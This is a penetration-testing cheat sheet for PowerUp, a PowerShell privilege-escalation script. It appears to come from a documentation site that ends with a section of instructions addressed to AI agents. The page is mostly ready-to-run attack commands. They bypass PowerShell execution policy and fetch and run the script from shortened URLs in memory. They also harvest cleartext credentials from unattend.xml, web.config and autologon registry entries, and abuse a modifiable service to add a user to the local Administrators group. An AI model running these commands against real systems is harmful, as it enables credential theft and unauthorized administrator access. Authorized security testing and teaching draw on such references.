# Powerup

## Initial Execution

```bash
# Load from disk
Powershell.exe -nop -exec bypass
. .\powerup.ps1

# Load from Github
Powershell IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

# Invoke-AllChecks
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

# Invoke-AllChecks and load script in one command
powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}

# Invoke-AllChecks without touching disk
 powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks”
```

## Commands

### Miscellaneous

```bash
# Check for credentials in unattend.xml files
Get-UnattendedInstallFile

# Get cleartext credentials and encrypted strings from web config files
Get-Webconfig

# Get current user tokens and privileges
Get-ProcessTokenPrivilege
```

### Services

```bash
# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

#Get the services whose configuration the current user can modify
Get-ModifiableService -Verbose

# Exploit vulnerable service 
Invoke-ServiceAbuse -Name "Vuln-Service" -Command "net localgroup Administrators security.local\moe /add"
```

### Registry

```bash
# Checks if MSI files are always installed in context of SYSTEM
Get-RegistryAlwaysInstallElevated

# Checks if any autologon credentials exists in registry locations
Get-RegistryAutologon

# Gets autoruns where the current user can modify the script or binary
Get-ModifiableRegistryAutoRun
```

## References

{% embed url="<https://blog.certcube.com/powerup-cheatsheet/>" %}

{% embed url="<https://powersploit.readthedocs.io/en/latest/#overview>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/resources/cheat-sheets/powerup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.